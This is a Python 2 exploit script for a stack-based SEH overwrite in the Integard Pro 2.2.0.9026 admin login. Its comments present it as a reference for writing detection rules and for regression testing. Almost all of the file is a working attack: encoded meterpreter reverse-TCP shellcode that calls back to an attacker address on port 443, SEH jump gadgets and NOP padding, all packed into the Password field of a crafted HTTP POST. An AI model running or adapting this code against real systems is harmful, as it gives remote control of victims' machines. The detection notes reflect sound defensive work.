#!/usr/bin/python
#################################################
#~Integard Pro 2.2.0.9026 SEH overwrite exploit~#
#~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~#
#################################################
# Proof-of-concept for a historical stack overflow in the Integard Pro
# admin login handler (version 2.2.0.9026 per the header above): the whole
# script is one hand-built HTTP POST to /LoginAdmin with an oversized
# "Password" form field. Kept as a reference for writing detection rules
# and for regression-testing a patched build.
# Python 2 only: every buffer is a str used as a byte string, and
# socket.send() is handed a str, which Python 3 rejects.
import socket
import os       # NOTE: imported but unused in this script
import sys      # NOTE: imported but unused in this script
from struct import pack
# Lab addresses as committed by the author; treat them as placeholders.
host = "10.0.0.130"
port = 18881
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=443
#-b "\x00, \x20, \x26, \x2f \x3d, \x3f, \x5c" EXITFUNC=thread -f python
# Payload size: 366 bytes
# Encoder-generated payload bytes reproduced verbatim; they are opaque and
# are not annotated here. The -b list above names the bytes the author
# had to avoid (NUL, space, '&', '/', '=', '?', '\').
buf = ""
buf += "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
buf += "\xe2\xed\x88\x9e\x83\xeb\xfc\xe2\xf4\x1e\x05\x0a\x9e"
buf += "\xe2\xed\xe8\x17\x07\xdc\x48\xfa\x69\xbd\xb8\x15\xb0"
buf += "\xe1\x03\xcc\xf6\x66\xfa\xb6\xed\x5a\xc2\xb8\xd3\x12"
buf += "\x24\xa2\x83\x91\x8a\xb2\xc2\x2c\x47\x93\xe3\x2a\x6a"
buf += "\x6c\xb0\xba\x03\xcc\xf2\x66\xc2\xa2\x69\xa1\x99\xe6"
buf += "\x01\xa5\x89\x4f\xb3\x66\xd1\xbe\xe3\x3e\x03\xd7\xfa"
buf += "\x0e\xb2\xd7\x69\xd9\x03\x9f\x34\xdc\x77\x32\x23\x22"
buf += "\x85\x9f\x25\xd5\x68\xeb\x14\xee\xf5\x66\xd9\x90\xac"
buf += "\xeb\x06\xb5\x03\xc6\xc6\xec\x5b\xf8\x69\xe1\xc3\x15"
buf += "\xba\xf1\x89\x4d\x69\xe9\x03\x9f\x32\x64\xcc\xba\xc6"
buf += "\xb6\xd3\xff\xbb\xb7\xd9\x61\x02\xb2\xd7\xc4\x69\xff"
buf += "\x63\x13\xbf\x85\xbb\xac\xe2\xed\xe0\xe9\x91\xdf\xd7"
buf += "\xca\x8a\xa1\xff\xb8\xe5\x64\x60\x61\x32\x55\x18\x9f"
buf += "\xe2\xed\xa1\x5a\xb6\xbd\xe0\xb7\x62\x86\x88\x61\x37"
buf += "\x87\x82\xf6\xe8\xed\x88\x1e\x8a\xef\x88\x9f\x59\x64"
buf += "\x6e\xce\xb2\xbd\xd8\xde\xb2\xad\xd8\xf6\x08\xe2\x57"
buf += "\x7e\x1d\x38\x1f\xf4\xf2\xbb\xdf\xf6\x7b\x48\xfc\xff"
buf += "\x1d\x38\x0d\x5e\x96\xe7\x77\xd0\xea\x98\x64\x76\x85"
buf += "\xed\x88\x9e\x88\xed\xe2\x9a\xb4\xba\xe0\x9c\x3b\x25"
buf += "\xd7\x61\x37\x6e\x70\x9e\x9c\xdb\x03\xa8\x88\xad\xe0"
buf += "\x9e\xf2\xed\x88\xc8\x88\xed\xe0\xc6\x46\xbe\x6d\x61"
buf += "\x37\x7e\xdb\xf4\xe2\xbb\xdb\xc9\x8a\xef\x51\x56\xbd"
buf += "\x12\x5d\x1d\x1a\xed\xf5\xb6\xba\x85\x88\xde\xe2\xed"
buf += "\xe2\x9e\xb2\x85\x83\xb1\xed\xdd\x77\x4b\xb5\x85\xfd"
buf += "\xf0\xaf\x8c\x77\x4b\xbc\xb3\x77\x92\xc6\xe2\x0d\xee"
buf += "\x1d\x12\x77\x77\x79\x12\x77\x61\xe3\x2e\xa1\x58\x97"
buf += "\x2c\x4b\x25\x1c\xe3\xba\x74\x88\xed\xdb\x61\x37\x87"
buf += "\x88\x5d"
# POP POP RET in integard.exe
# The address below is specific to this build of integard.exe; the author's
# own notes on the remaining pieces follow and are left as written.
nSeh = "\xEB\xd0\x90\x90" # JMP 48 bytes backwards
Seh = pack("<L", 0x004042B0)
jumpCall = "\xeb\x09" #JMP 11 bytes forward to hit the CALL in bigBackJump
# Decrement ECX by 768 bytes and jump to it
bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
# The leading NOP padding is computed so that the first five pieces always
# total exactly 3096 bytes; with nSeh (4) and Seh (4) appended, the
# "Password" value sent is 3104 bytes long.
crash = "\x90" * (3096 - len(jumpCall) -len(bigBackJump) -len(buf) - 50)
crash += buf
crash += "\x90" * 50
crash += jumpCall
crash += bigBackJump
crash += nSeh
crash += Seh
# Raw HTTP/1.1 request assembled by hand; no HTTP library is used.
# Detection note: the declared Content-Length (78) does not match the real
# body, which is over 3 KB, and the Password field is dominated by long
# runs of \x90. Either is a cheap signature for a rule watching port 18881.
buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1\r\n"
buffer += "Host: 10.0.0.130:18881\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://10.0.0.130:18881/\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: 78\r\n\r\n"
buffer += "Password=" + crash + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login\r\n"
# Single plain TCP connection; the request is written once and the socket
# closed without reading a response, so the script reports nothing.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()